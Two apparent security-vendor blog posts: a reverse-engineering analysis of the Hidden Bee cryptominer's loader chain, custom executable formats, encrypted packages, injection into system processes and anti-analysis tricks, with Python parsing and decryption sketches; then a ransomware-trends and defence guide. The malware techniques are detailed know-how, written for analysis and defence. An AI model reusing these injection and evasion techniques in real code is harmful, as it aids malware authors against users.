Hidden Bee has a long chain of components that finally lead to loading of the miner. On the way, we will find a variety of customized formats: data packages, executables, and filesystems. The filesystems are going to be mounted in the memory of the malware, and additional plugins and configuration are retrieved from there. Hidden Bee communicates with the C&C to retrieve the modules—on the way also using its own TCP-based protocol.

The first part of the loading process is described by the following diagram:

Each of the .spk packages contains a custom ‘SPUTNIK’ filesystem, containing more executable modules.

Starting the analysis from the loader, we will go down to the plugins, showing the inner workings of each element taking part in the loading process.

The loader

In contrast to most of the malware that we see nowadays, the loader is not packed with any crypter. According to the header, it was compiled in November 2018.

While in the former edition the modules in the custom formats were dropped as separate files, this time the next stage is unpacked from inside the loader.

The loader is not obfuscated. Once we load it with typical tools (IDA), we can clearly see how the new format is loaded.

The loading function

Section .shared contains the configuration:

Encrypted configuration. The last 16 bytes after the data block is the key.

The configuration is decrypted with the help of XTEA algorithm.

Decrypting the configuration

The decrypted configuration must start from the magic WORD “pZ.” It contains the C&C and the name under which the service will be installed:

Unscrambling the NE format

The NE format was seen before, in former editions of Hidden Bee. It is just a scrambled version of the PE. By observing which fields have been misplaced, we can easily reconstruct the original PE.

The loader, unpacking the next stage

NE is one of the two similar formats being used by this malware. Another one starts from a DWORD 0x0EF1FAB9 and is used to load further components. Both of them have an analogous structure that comes from a slightly modified PE format:


WORD magic; // 'NE'
WORD pe_offset;
WORD machine_id;

The conversion back to PE format is trivial: It is enough to add the erased magic numbers: MZ and PE, and to move displaced fields to their original offsets. The tool that automatically does the mentioned conversion is available here.
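As a rough illustration of the idea, restoring the erased magics might look like the sketch below. The field layout is simplified (only the header fields shown in the structure above are handled); the linked tool performs the full conversion.

```python
import struct

def ne_to_pe(data: bytes) -> bytes:
    # Simplified sketch: the real converter also moves the remaining
    # displaced header fields back to their original offsets.
    assert data[:2] == b"NE", "not an NE module"
    pe_offset, machine_id = struct.unpack_from("<HH", data, 2)
    fixed = bytearray(data)
    fixed[0:2] = b"MZ"                                 # restore the DOS magic
    struct.pack_into("<I", fixed, 0x3C, pe_offset)     # e_lfanew -> NT headers
    fixed[pe_offset:pe_offset + 4] = b"PE\x00\x00"     # restore the NT magic
    struct.pack_into("<H", fixed, pe_offset + 4, machine_id)  # COFF Machine
    return bytes(fixed)
```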

In the previous edition, the parts of Hidden Bee with analogous functionality were delivered in a different, more complex proprietary format than the one currently being analyzed.

Second stage: a downloader (in NE format)

As a result of the conversion, we get the following PE: (fddfd292eaf33a490224ebe5371d3275). This module is a downloader of the next stage. The interesting thing is that the subsystem of this module is set as a driver; however, it is not loaded like a typical driver. The custom loader loads it into user space just like any typical userland component.

The function at the module’s Entry Point is called with three parameters. The first is a path of the main module. Then, the parameters from the configuration are passed. Example:

0012FE9C 00601A34 UNICODE "\"C:\Users\tester\Desktop\new_bee.exe\""
0012FEA0 00407104 UNICODE "NAPCUYWKOxywEgrO"
0012FEA4 00407004 UNICODE ""

Calling the Entry Point of the manually-loaded NE module

The execution of the module can take one of the two paths. The first one is meant for adding persistence: The module installs itself as a service.

If the module detects that it is already running as a service, it takes the second path. In that case, it proceeds to download the next module from the server. The next module is packed as a Cabinet file.

The downloaded Cabinet file is being passed to the unpacking function

It is first unpacked into a file named “core.sdb”. The unpacked module is in a customized format based on PE. This time, the format has a different signature, “NS”, and it differs from the aforementioned “NE” format (a detailed explanation is given further below).

It is loaded by the proprietary loader.

The loader enumerates all the executables in the directory %Systemroot%\Microsoft.NET\ and selects the ones with compatible bitness (in the analyzed case, it was selecting 32-bit PEs). Once it finds a suitable PE, it runs it and injects the payload there. The injected code is run by adding its entry point to the APC queue.
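The bitness check can be illustrated with a short sketch that reads the COFF Machine field of each candidate PE. This is a hypothetical reimplementation of the selection logic, not the malware’s own code:

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664

def pe_machine(data: bytes):
    # Return the COFF Machine field of a PE image, or None if it isn't one.
    if data[:2] != b"MZ" or len(data) < 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if len(data) < e_lfanew + 6 or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    return struct.unpack_from("<H", data, e_lfanew + 4)[0]

def is_32bit_pe(data: bytes) -> bool:
    return pe_machine(data) == IMAGE_FILE_MACHINE_I386
```

A loader would simply walk the directory, run each file through a check like this, and keep the first match.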

Hidden Bee component injecting the next stage (core.sdb) into a new process

In case it failed to find the suitable executable in that directory, it performs the injection into dllhost.exe instead.

Unscrambling the NS format

As mentioned before, core.sdb is in yet another format, named NS. It is also a customized PE; however, this time the conversion is more complex than for the NE format because more structures are customized. It looks like the next step in the evolution of the NE format.

Header of the NS format

We can see that the changes to the PE headers are bigger and more lossy; only minimal information is maintained, and only a few Data Directories are left. The sections table is also shrunk: Each section header contains only four out of the nine fields in the original PE.

Additionally, the format allows the loader to pass a runtime argument to the payload via the header: The pointer is saved into an additional field (marked “Filled Data” in the picture).

Not only is the PE header shrunk. Similar customization is done on the Import Table:

Customized part of the NS format’s import table

This custom format can also be converted back to the PE format with the help of a dedicated converter, available here.

Third stage: core.sdb

The core.sdb module converted to PE format is available here: a17645fac4bcb5253f36a654ea369bf9.

The interesting part is that the external loader does not complete the full loading process of the module. It only copies the sections; the rest of the loading, such as applying relocations and filling imports, is done internally by core.sdb.

The loading function is just at the Entry Point of core.sdb

The previous component was supposed to pass core.sdb an additional buffer with data about the installed service: the name and the path. During its execution, core.sdb will look up this data. If found, it will delete the previously-created service, as well as the initial file that started the infection:

Removing the initial service

Getting rid of the previous persistence method suggests that it will be replaced by some different technique. Knowing previous editions of Hidden Bee, we can suspect that it may be a bootkit.

After locking a mutex with a name in the format Global\SC_{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, the module proceeds to download another component. But before the download, a few things are checked first.

Checks done before download of the next module

First of all, there is a defensive check for whether any known debuggers or sniffers are running. If so, the function quits.

The blacklist

There is also a check of whether the application can open the file ‘\??\NPF-{0179AC45-C226-48e3-A205-DCA79C824051}’.

If all the checks pass, the function proceeds and queries the following URL, where GET variables contain the system fingerprint:


The hash (sz=) is an MD5 generated from VolumeIDs. Then follows (os=), identifying the version of the operating system, and (ar=), the identifier of the architecture, where 0 means 32-bit and 1 means 64-bit.
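Assuming the parameters are assembled as described (exactly how the VolumeIDs are concatenated before hashing is a guess), the fingerprint query string could be sketched as:

```python
import hashlib
from urllib.parse import urlencode

def fingerprint_query(volume_ids, os_version: str, is_64bit: bool) -> str:
    # sz: MD5 over the VolumeIDs (concatenation order is an assumption),
    # os: OS version string, ar: 0 = 32-bit, 1 = 64-bit.
    sz = hashlib.md5("".join(volume_ids).encode()).hexdigest()
    return urlencode({"sz": sz, "os": os_version, "ar": int(is_64bit)})

# Hypothetical values, for illustration only:
print(fingerprint_query(["1234-ABCD"], "6.1", False))
```

A fingerprint like this lets the C&C serve different payloads per victim and refuse to answer repeat or unexpected requests.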

The content downloaded from this URL (starting from a magic DWORD 0xFEEDFACE – 79e851622ac5298198c04034465017c0) contains the encrypted package (in !rbx format), and a shellcode that will be used to unpack it. The shellcode is loaded to the current process and then executed.

The ‘FEEDFACE’ module contains the shellcode to be loaded

The shellcode’s start function uses three parameters: pointer to the functions in the previous module (core sdb), pointer to the buffer with encrypted data, size of the encrypted data.

The loader calling the shellcode

Fourth stage: the shellcode decrypting !rbx

The beginning of the loaded shellcode:

The shellcode does not fill any imports by itself. Instead, it fully relies on the functions from the core.sdb module, a pointer to which it receives. It makes use of the following functions: malloc, memcpy, memfree, VirtualAlloc.

Example: calling malloc via core.sdb

Its role is to reveal another part. It comes in an encrypted package starting from a marker !rbx. The decryption function is called just at the beginning:

Calling the decrypting function (at Entry Point of the shellcode)

First, the function checks the !rbx marker and the checksum at the beginning of the encrypted buffer:

Checking marker and then checksum

It is decrypted with the help of the RC4 algorithm, and then decompressed.

After decryption, the markers at the beginning of the buffer are checked. The expected format must start with the predefined magic DWORDs: 0xCAFEBABE, 0, 0xBABECAFE:

The !rbx package format

The !rbx is also a custom format with a consistent structure.

DWORD magic; // "!rbx"
DWORD checksum;
DWORD content_size;
BYTE rc4_key[16];
DWORD out_size;
BYTE content[];
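Putting the layout above together with the RC4 step, a parser for the !rbx container might look like this sketch (checksum verification and the final decompression step, whose algorithm isn’t specified here, are omitted):

```python
import struct

def rc4(key: bytes, data: bytes) -> bytes:
    # Textbook RC4: key scheduling followed by the PRGA keystream XOR.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def unpack_rbx(blob: bytes) -> bytes:
    # Field offsets follow the structure listed above.
    magic, checksum, content_size = struct.unpack_from("<4sII", blob, 0)
    assert magic == b"!rbx", "bad marker"
    rc4_key = blob[12:28]
    # out_size (the DWORD at offset 28) would be the decompressed size.
    content = blob[32:32 + content_size]
    return rc4(rc4_key, content)  # decompression step omitted
```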

The custom file system (BABECAFE)

The full decrypted content has a consistent structure, reminiscent of a file system. According to previous reports, earlier versions of Hidden Bee adapted the ROM FS filesystem, adding a few modifications; they called their customized version “Mixed ROM FS”. Now it seems that their customization has progressed further, and the keywords suggesting ROM FS can no longer be found. The header starts with markers in the form of three DWORDs: { 0xCAFEBABE, 0, 0xBABECAFE }.

The layout of BABECAFE FS:

We notice that it differs at many points from ROM FS, from which it evolved.

The structure contains the following files:

/installer/com_x86.dll (6177bc527853fe0f648efd17534dd28b)

The files /pkg/sputnik.spk and /pkg/plugins.spk are both compressed packages in a custom !rsi format.

Beginning of the !rsi package in the BABECAFE FS

Each of the .spk packages contains another custom filesystem, identified by the keyword SPUTNIK (possibly the extension ‘spk’ is derived from the SPUTNIK format). They will be unpacked during the next steps of the execution.

Unpacked plugins.spk: 4c01273fb77550132c42737912cbeb36
Unpacked sputnik.spk: 36f3247dad5ec73ed49c83e04b120523.

Selecting and running modules

Some executables stored in the filesystem come in two versions: 32- and 64-bit. Only the modules relevant to the current architecture are loaded. So, in the analyzed case, the loader first chooses /bin/i386/preload (shellcode) and /bin/i386/coredll.bin (a module in the NS custom format). The names are hardcoded within the loading shellcode:

Searching the modules in the custom file system

After the proper elements are fetched (preload and coredll.bin), they are copied together into a newly-allocated memory area. The coredll.bin is copied just after preload. Then, the preload module is called:

Redirecting execution to preload

The preload is position-independent, and its execution starts from the beginning of the page.

Entering ‘preload’

The only role of this shellcode is to prepare and run the coredll.bin. So, it contains a custom loader for the NS format that allocates another memory area and loads the NS file there.

Fifth stage: preload and coredll

After loading coredll, preload redirects the execution there.

coredll at its Entry Point

The coredll patches a function inside NTDLL, KiUserExceptionDispatcher, redirecting one of the inner calls to its own code:

A patch inside KiUserExceptionDispatcher

Depending on which process the coredll was injected into, it can take one of a few paths of execution.

If it is running for the first time, it will try to inject itself again—this time into rundll32. For the purpose of the injection, it will again unpack the original !rbx package and use its original copy stored there.

Entering the unpacking function

Inside the unpacking function: checking the magic “!rbx”

Then it will choose the modules depending on the bitness of the rundll32:

It selects the pair of modules (preload/coredll.bin) appropriate for the architecture, either from the directory amd64 or from i386:

If the injection failed, it makes another attempt, this time trying to inject into dllhost:

Each time it uses the same, hardcoded parameter (/Processid: {...}) that is passed to the created process:

The thread context of the target process is modified, and then the thread is resumed, running the injected content:

Now, when we look inside the memory of rundll32, we can find the preload and coredll being mapped:

Inside the injected part, the execution follows a similar path: preload loads the coredll and redirects to its Entry Point. But then, another path of execution is taken.

The parameter passed to the coredll decides which round of execution it is. On the second round, another injection is made: this time to dllhost.exe. And finally, it proceeds to the final round, when other modules are unpacked from the BABECAFE filesystem.

Parameter deciding which path to take

The unpacking function first searches by name for two more modules: sputnik.spk and plugins.spk. They are both in the mysterious !rsi format, which reminds us of !rbx, but has a slightly different structure.

Entering the function unpacking the first !rsi package:

The function unpacking the !rsi format is structured similarly to the !rbx unpacking. It also starts from checking the keyword:

Checking “!rsi” keyword

As mentioned before, both !rsi packages are used to store filesystems marked with the keyword “SPUTNIK”. It is another custom filesystem invented by the Hidden Bee authors that contains additional modules.

The “SPUTNIK” keyword is checked after the module is unpacked

Unpacking the sputnik.spk resulted in getting the following SPUTNIK module: 455738924b7665e1c15e30cf73c9c377

It is worth noting that the unpacked filesystem contains four executables: two pairs, each consisting of an NS and a PE file, in 32- and 64-bit versions. In the currently-analyzed setup, the 32-bit versions are deployed.

The NS module will be the next to be run. First, it is loaded by the current executable, and then the execution is redirected there. Interestingly, both !rsi modules are passed as arguments to the entry point of the new module. (They will be used later to retrieve more components.)

Calling the newly-loaded NS executable

Sixth stage: mpsi.dll (unpacked from SPUTNIK)

Entering into the NS module starts another layer of the malware:

Entry Point of the NS module: the !rsi modules, perpended with their size, are passed

The analyzed module, converted to PE is available here: 537523ee256824e371d0bc16298b3849

This module is responsible for loading plugins. It will also create a named pipe through which it will communicate with other modules. It sets up the commands that are going to be executed on demand.

This is how the beginning of the main function looks:

Like in previous cases, it starts by finishing its own loading (relocations and imports). Then, it patches the function in NTDLL. This is a common prolog in many Hidden Bee modules.

Then, we have another phase of loading elements from the supplied packages. The path that will be taken depends on the runtime arguments. If the function received both !rsi packages, it will start by parsing one of them, retrieving and loading submodules.

First, the SPUTNIK filesystem must be unpacked from the !rsi package:

After being unpacked, it is mounted. The filesystems are mounted internally in the memory: A global structure is filled with pointers to appropriate elements of the filesystem.

At the beginning, we can see the list of the plugins that are going to be loaded: cloudcompute.api, deepfreeze.api, and netscan.api. Those names are being appended to the root path of the modules.

Each module is fetched from the mounted filesystem and loaded:

Calling the function to load the plugin

Consecutive modules are loaded one after another into the same executable memory area. After a module is loaded, its header is erased. This is a common technique used to make dumping the payload from memory more difficult.
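The anti-dumping trick is simple to illustrate: once the module is mapped, the loader zeroes the region where the header lived, so a memory dump no longer starts with recognizable metadata. A hedged sketch (the default header size here is a placeholder; a real loader would read the actual size from the header before wiping it):

```python
def erase_header(image: bytearray, header_size: int = 0x400) -> None:
    # Zero out the first header_size bytes of the mapped module so that a
    # dump of this region no longer begins with the "MZ" magic.
    n = min(header_size, len(image))
    image[:n] = b"\x00" * n


module = bytearray(b"MZ\x90\x00" + b"\xcc" * 32)  # toy "mapped module"
erase_header(module, header_size=4)
print(module[:2])  # the MZ magic is gone
```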

The cloudcompute.api is a plugin that will load the miner. More about the plugins will be explained in the next section of this post.

Reading its code, we find that the SPUTNIK modules are filesystems that can be mounted and dismounted on demand. This module communicates with the others via a named pipe, receiving commands and executing the appropriate handlers.

Initialization of the commands’ parser:

The function setting up the commands: For each name, a handler is registered. (This is probably the Lua dispatcher, first described here.)
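A dispatcher of this shape is easy to sketch: a table maps each command name to a registered handler, and each message arriving over the pipe is routed through the table. The command names below are illustrative only, not recovered from the sample:

```python
handlers = {}


def register(name):
    # Associate a command name with its handler, as the setup routine does.
    def wrap(fn):
        handlers[name] = fn
        return fn
    return wrap


@register("mount")
def cmd_mount(arg):
    return f"mounted {arg}"


@register("unmount")
def cmd_unmount(arg):
    return f"unmounted {arg}"


def dispatch(line):
    # Split "name arg" as it might arrive over the pipe, then run the handler.
    name, _, arg = line.partition(" ")
    fn = handlers.get(name)
    return fn(arg) if fn else "unknown command"


print(dispatch("mount sputnik.spk"))  # routed to cmd_mount
```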

When plugins are run, we can see some additional child processes created by the process running the coredll (in the analyzed case it is inside rundll32):

It also triggers a firewall alert, which means the malware requested that some ports be opened (triggered by the netscan.api plugin):

We can see that it started listening on one TCP and one UDP port:

The plugins

As mentioned in the previous section, the SPUTNIK filesystem contains three plugins: cloudcompute.api, deepfreeze.api, and netscan.api. If we convert them to PE, we can see that all of them import an unknown DLL: mpsi.dll. Looking at the filled import table, we find that the addresses have been filled in, redirecting to functions from the previous NS module:

So we can conclude that the previous element is mpsi.dll. Although its export table has been destroyed, the functions are fetched by the custom loader and filled into the import tables of the loaded plugins.
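The mechanism can be sketched as follows: the loader keeps its own private name-to-address map and writes those addresses into each plugin’s import table, so no export table is needed in the module itself. All names and addresses below are invented for illustration:

```python
# The loader's private "export" map; names and addresses are invented.
resolved = {
    "mpsi.dll!PipeOpen": 0x10001000,
    "mpsi.dll!PipeRead": 0x10001040,
}


def fill_iat(import_names):
    # Replace each imported name with the loader-known address. A real
    # loader would write these values directly into the plugin's IAT
    # in memory rather than returning a list.
    return [resolved[name] for name in import_names]


print(fill_iat(["mpsi.dll!PipeRead", "mpsi.dll!PipeOpen"]))
```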

First, cloudcompute.api is run.

This plugin retrieves from the filesystem a file named “/etc/ccmain.json” that contains the list of URLs:

Those are addresses from which another set of modules is going to be downloaded:


It also retrieves another component from the SPUTNIK filesystem: /bin/i386/ccmain.bin. This time, it is an executable in NE format (a version converted to PE is available here: 367db629beedf528adaa021bdb7c12de).

This is the component that is injected into msdtc.exe.

The HiddenBee module mapped into msdtc.exe

The configuration is also copied into the remote process and is used to retrieve an additional package from the C&C:

This is the plugin responsible for downloading and deploying the Mellifera Miner, the core component of Hidden Bee.

Next, the netscan.api loads module /bin/i386/kernelbase.bin (converted to PE: d7516ad354a3be2299759cd21e161a04)

The miner in APT-style

Hidden Bee is an eclectic malware. Although it is a commodity malware used for cryptocurrency mining, its design reminds us of espionage platforms used by APTs. Going through all its components is exhausting, but also fascinating. The authors are highly professional, not only as individuals but also as a team, because the design is consistent in all its complexity.

Appendix – helper tools for parsing and converting Hidden Bee custom formats

Articles about the previous version (in Chinese):

Our first encounter with the Hidden Bee:

The post Hidden Bee: Let’s go down the rabbit hole appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Ransomware isn’t just a big city problem

Malwarebytes - Fri, 05/31/2019 - 15:00

This month, one ransomware story has been making a lot of waves: the attack on Baltimore city networks. This attack has been receiving more press than normal, which could be due to the actions taken (or not taken) by the city government, as well as rumors about the ransomware infection mechanism.

Regardless, the Baltimore story inspired us to investigate other cities in the United States, identifying which have had the most detections of ransomware this year. While we did pinpoint numerous cities whose organizations had serious ransomware problems, neither Baltimore nor any of the other high-profile cities attacked, such as Atlanta or Greenville, was among them. This follows a trend of increasing ransomware infections on organizational networks that we’ve been watching for a while now.

To curb this, we are providing our readers with a guide on how to not only avoid being hit with ransomware, but also deal with the fallout of an attack. Basically, this is a guide on how not to be the next Baltimore. While many of these attacks are targeted, cybercriminals are opportunistic—if they see an organization has vulnerabilities, they will swoop in and do as much damage as they can. And ransomware is about as damaging as it gets.

Baltimore ransomware attack

As of press time, Baltimore city servers are still down. The original attack occurred on May 7, 2019, and as soon as it happened, the city shut down numerous servers on its networks to keep them secure from the possible spread of the ransomware.

The ransomware that infected Baltimore is called RobbinHood, also spelled RobinHood. When a ransom note was discovered, it demanded a payment of $100,000, or about 13 Bitcoins. Much like other ransomware, it came with a timer, demanding that victims pay up by a certain date or the cost of recovering files would go up by $10,000 a day.

RobinHood ransom note, Courtesy Lawrence Abrams & Bleeping Computer

RobinHood ransomware is a newer malware family, but it has already made a name for itself by infecting other city networks, as it did in the City of Greenville. According to a report from the New York Times, some malware researchers have claimed that the NSA-leaked exploit EternalBlue is involved in the infection process. However, analysis by Vitali Kremez at SentinelOne did not show any sign of EternalBlue activity; rather, the ransomware spreads from system to system through manipulation of the PsExec tool.

This is not the first cyberattack Baltimore has dealt with recently. In fact, last year its 911 dispatch systems were compromised by attackers, leaving the dispatchers using pen and paper to conduct their work. Some outlets have blamed the city’s historically inefficient network design on previous Chief Information Officers (CIOs), of which there have been many. Two of its CIOs resigned in this decade alone amidst allegations of fraud and ethical violations.


Baltimore aside, ransomware aimed at organizations has been active in the United States over the course of the last six months, with periodic spurts and massive spikes that represent a new approach to corporate infection by cybercriminals.

The below heat map shows a compounding effect of ransomware detections in organizations across the country from the beginning of 2019 to now.

A heat map of ransomware detections in organizations from January 2019 to present day

Primary areas of heavy detection include regions around larger cities, for example, Los Angeles and New York, but we see heavy detections in less populated areas as well. The below diagram further illustrates this trend: Color depth represents the overall detection count for the state, while the size of the red circles represents the number of detections in various cities. The deeper the color, the more detections the state contains; the larger the circle, the higher the number of detections in the city.

US map of overall state and city detections of organization-focused ransomware in 2019

When we take an even deeper look and identify the top 10 cities in 2019 (so far) with heavy ransomware detections, we see that none of them include cities we’ve read about in the news recently. This trend supports the theory that you don’t need to be surrounded by victims of ransomware to become one.

Wherever ransomware decides to show up, it is going to take advantage of weak infrastructure, configuration issues, and unaware users to break into the network. Ransomware is becoming a more common weapon to wield against businesses than it was in years past. The below chart shows the massive spike of ransomware detections we saw earlier in the year.

January and February are shining examples of the kind of heavy push we saw from families like Troldesh earlier in the year. However, while it may seem like ransomware died off after March, we think of it more as the criminals taking a breather. When we dig into weekly trends, we can see specific spikes that were due to heavy detections of specific ransomware families.

Unlike what we’ve observed in the past with consumer-focused ransomware, where a wide net was cast and we observed a near constant flood of detections, ransomware focused on the corporate world attacks in short pulses. These may be due to certain time frames being best for attacking organizations, or it could be the time required to plan an attack against corporate users, which calls for the collection of corporate emails and contact info before launching.

Regardless, ransomware activity in 2019 has already hit a record number, and while we have only seen a few spikes in the last couple of months, you can consider these road bumps between two big walls. We just haven’t hit the second wall yet.


Despite an increase in ransomware targeting organizational networks, city networks that have been impacted by ransomware do not show up on our list of top infected cities. This leads us to believe that ransomware attacks on city infrastructure, like what we are seeing in Baltimore, do not occur because of widespread outbreaks, but rather are targeted and opportunistic.

In fact, most of these attacks are due to vulnerabilities, gaps in operational security, and overall weak infrastructure discovered and exploited by cybercriminals. They often gain a foothold into the organization through ensnaring employees in phishing campaigns and infecting endpoints or having enough confidence to launch a spear phishing campaign against high-profile targets in the organization.

Real spear phishing email (Courtesy of Lehigh University)

There is also always a case to be made about misconfigurations, slow updating or patching, and even insider threats being the cause of some of these attacks. Security researchers and city officials still do not have a concrete answer for how RobinHood infected Baltimore systems in the first place.


There are multiple answers to the question, “How do I beat ransomware?” and unfortunately, none of them apply 100 percent of the time. Cybercriminals spent the better part of 2018 experimenting with novel methods of breaking through defenses with ransomware, and it looks like they’re putting those experiments to the test in 2019. Even if organizations follow “all the rules,” there are always new opportunities for infection. However, there are ways to get ahead of the game and avoid worst-case scenarios. Here are four areas to consider when planning for ransomware attacks:


While we did say that EternalBlue likely did not play a part in the spread of RobinHood ransomware, it has been used by other ransomware and malware families in the past. To this end, patching systems is becoming more and more important every day, because developers aren’t just fixing usability bugs or adding new features, but filling holes that can be exploited by the bad guys.

While patching quickly is not always possible on an enterprise network, identifying which patches are required to avoid a potential disaster and deploying those within a limited scope (as in, to systems that are most vulnerable or contain highly-prioritized data) is necessary. In most cases, inventorying and auditing patches should be completed, regardless of whether the patch can be rolled out across the org or not.


For the last seven or so years, many software developers, including those of operating systems, have created tools to help fight cybercrime within their own products. These tools are often not offered as an update to existing software, but are included in upgraded versions. Windows 10, for example, has anti-malware capabilities built into the operating system, making it a more difficult target for cybercriminals than Windows XP or Windows 7. Look to see which software and systems are nearing end-of-life in their development cycle. If they’ve been phased out of support by the developer, it’s a good idea to upgrade the software altogether.

In addition to operating systems, it’s important to at least consider and test an upgrade of other resources on the network. This includes various enterprise-grade tools, such as collaboration and communication platforms, cloud services, and in some cases hardware.


Today, email attacks are the most common method of spreading malware, using either widespread phishing attacks that dupe whomever they can, or specially-crafted spear phishing attacks, where a particular target is fooled.

Therefore, there are three areas that organizations can focus on when it comes to avoiding ransomware infections, or any malware for that matter: email protection tools, user education and security awareness training, and post-email execution blocking.

There are numerous tools that provide additional security and potential threat identification for email servers. These tools reduce the number of potential attack emails your employees will receive; however, they may slow down email sending and receiving because they check all the mail coming in and out of a network.

User education, however, involves teaching your users what a phishing attack looks like. Employees should be able to identify a threat based on appearance rather than functionality and, at the least, know what to do if they encounter such an email. Instruct users to forward shady emails to the in-house security or IT teams to investigate the threat further.

Finally, using endpoint security software will block many attempts at infection via email, even if the user ends up opening a malicious attachment. The most effective endpoint solution should include technology that blocks exploits and malicious scripts, as well as real-time protection against malicious websites. While some ransomware families have decryptors available that help organizations retrieve their files, remediation of successful ransomware attacks rarely returns lost data.

Following the tips above will provide a better layer of defense against the primary methods of infection today, and can empower your organization to repel cyberattacks beyond ransomware.


Being able to avoid infection in the first place is obviously preferable for organizations, however, as mentioned before, many threat actors develop novel attack vectors to penetrate enterprise defenses. This means that you need to not only establish protection to prevent a breach, but ready your environment for an infection that will get through.

Preparing your organization for a ransomware attack shouldn’t be treated as an “if” but a “when” if you expect it to be useful.

To that end, here are four steps for making your organization ready for “when” you experience a ransomware attack.

Step 1: Identify valuable data

Many organizations segment their data access based on required need. This is called compartmentalization, and means that no single entity within the organization can access all data.  To that end, you need to compartmentalize your data and how it’s stored in the same spirit. The point of doing this is to keep your most valuable (and biggest problem if lost) data segmented from systems, databases, or users who don’t need to access this data on a regular basis, making it more difficult for criminals to steal or modify said data.

Customers’ personally identifiable information, intellectual property, and financial information are three types of data that should be identified and segmented from the rest of your network. What does Larry, the intern, need access to customer data for? Why is the secret formula for the product you sell on the same server as employee birthdays?

Step 2: Segment that data

If needed, you should roll out additional servers or databases that you can put behind additional layers of security, be it another firewall, multi-factor authentication, or just limiting how many users can have access. This is where the data identified in the previous step is going to live. 

Depending on your operational needs, some of this data might need to be accessed more than others and, in that case, you’ve got to set up your security to account for it, otherwise you might hurt operational efficiency beyond the point where the risk is worth the reward.

Some general tips on segmenting data:

  • Keep the system with this data far away from the open Internet
  • Require additional login requirements, like a VPN or multi-factor authentication to access the data
  • There should be a list of systems and which users have access to data on which systems. If a system is somehow breached, that is where you start.
  • If you have the time and resources, roll out a server that barely has protection, add data that looks legitimate but, in reality, is actually bogus, and ensure that it’s vulnerable and easy to identify by an attacker. In some cases, criminals will take the low-hanging fruit and leave, ensuring your actual valuable data remains untouched.       

Step 3: Data backup

Now your data has been segmented based on how important it is, and it’s sitting behind a greater layer of security than before. The next step is to once again identify and prioritize important data to determine how much of it can be backed up (hopefully all the important data, if not all the company data).  There are some things to consider when deciding on which tools to use to establish a secure backup:

  • Does this data need to be frequently updated?
  • Does this data need to remain in my physical security?
  • How quickly do I need to be able to back up my data?
  • How easy should it be to access my backups?

When you can answer these questions, you’ll be able to determine which type of long-term storage solution you need. There are three options: online, local, and offsite.
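One way to picture the decision is a toy helper that maps answers to the questions above onto one of the three options. The rules below are purely illustrative, not a recommendation; a real decision also weighs cost, compliance, and recovery-time objectives:

```python
def choose_backup(frequent_updates: bool, must_stay_onsite: bool,
                  fast_restore_needed: bool) -> str:
    # Illustrative mapping of the four questions to a storage option.
    if must_stay_onsite:
        return "local"       # physical control outranks convenience
    if frequent_updates or fast_restore_needed:
        return "online"      # easiest to update and reach
    return "offsite"         # rarely-touched, highly sensitive data


print(choose_backup(frequent_updates=True, must_stay_onsite=False,
                    fast_restore_needed=True))
```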

Online backups
Using an online backup solution is likely going to be the fastest and easiest for your employees and/or IT staff. You can access it from anywhere, use multi-factor authentication, and rest easy knowing it’s secured by people who secure data for a living. Backing up can be quick and painless with this method. However, the data is outside of the organization’s physical control, and if the backup service is breached, your data might be compromised.

Overall, online backup solutions are likely going to be the best option for most organizations, because of how easy they are to set up and utilize.

Local backups
Perhaps your organization requires local storage backups. This process can range from incredibly annoying and difficult to super easy and insecure.

Local storage allows you to store offline, yet onsite, maintaining a physical security presence. However, you are limited by your staff, resources, and space on how you can establish a backup operation locally. In addition, operational data that needs to be used daily may not be a candidate for this type of backup method.

Offsite backups
Our last option is storing data on removable hard drives or tapes and keeping them in an offsite location. This might be preferable if data is especially sensitive and needs to be kept away from the location where it was created or used. Offsite storage will ensure that your data is safe if the building explodes or is raided, but the process can be slow and tedious. You are also unlikely to use this method for operational data that requires regular access and backups.

Offsite backups are only needed for storing extremely sensitive information, such as government secrets, or when the data must be retained for record-keeping but regular access isn’t required.

Step 4: Create an isolation plan

Our last step in preparing your organization for a ransomware attack is to know exactly how you will isolate an infected system. The speed and method in which you do this could save the entire organization’s data from an actively-spreading ransomware infection.

A good isolation plan takes into consideration as many factors as possible:

  • Which systems can be isolated quickly, and which need more time (e.g., endpoints vs. servers)?
  • Can you isolate the system locally or remotely?
  • Do you have physical access?
  • How quickly can you isolate systems connected to the infected one?

Ask yourself these questions about every system in your network. If the answer to how quickly you can isolate a system is “not fast enough,” then it’s time to consider reconfiguring your network to speed up the process.

Luckily, there are tools that provide network administrators with the ability to remotely isolate a system once an infection is detected. Investing time and resources into ensuring you have an effective plan for protecting the other systems on your network is paramount with the type of threats we see today.
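Whatever tooling you use, the underlying exercise is an inventory: for each system, record whether it can be isolated remotely and how long isolation takes, then flag the slow ones for reconfiguration. A toy sketch with invented entries:

```python
# Invented example inventory; field names are illustrative only.
inventory = [
    {"name": "hr-laptop-12", "remote_isolation": True,  "minutes": 2},
    {"name": "db-server-01", "remote_isolation": False, "minutes": 45},
]


def too_slow(systems, limit_minutes=10):
    # Flag systems that cannot be cut off within the time limit; these are
    # candidates for network reconfiguration or a remote-isolation tool.
    return [s["name"] for s in systems if s["minutes"] > limit_minutes]


print(too_slow(inventory))  # ['db-server-01']
```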

Ransomware resilience

As we’ve covered, there has been a bumpy increase in organization-focused ransomware in 2019, and we expect to see more spikes in the months to come, but not necessarily in the cities you might expect. The reality is that the big-headline attacks on cities make up only a few of the hundreds of ransomware attacks that occur every single day against organizations across the country.

Cybercriminals will not obey the rules for how to conduct attacks. In fact, they are constantly looking for new opportunities, especially in places security teams are not actively covering. Therefore, spending all your resources on avoidance measures is going to leave your organization in a bad place. 

Taking the time to establish a plan for when you do get attacked, and building your networks, policies, and culture around that concept of resilience will prevent your organization from becoming another headline.

The post Ransomware isn’t just a big city problem appeared first on Malwarebytes Labs.

Categories: Techie Feeds

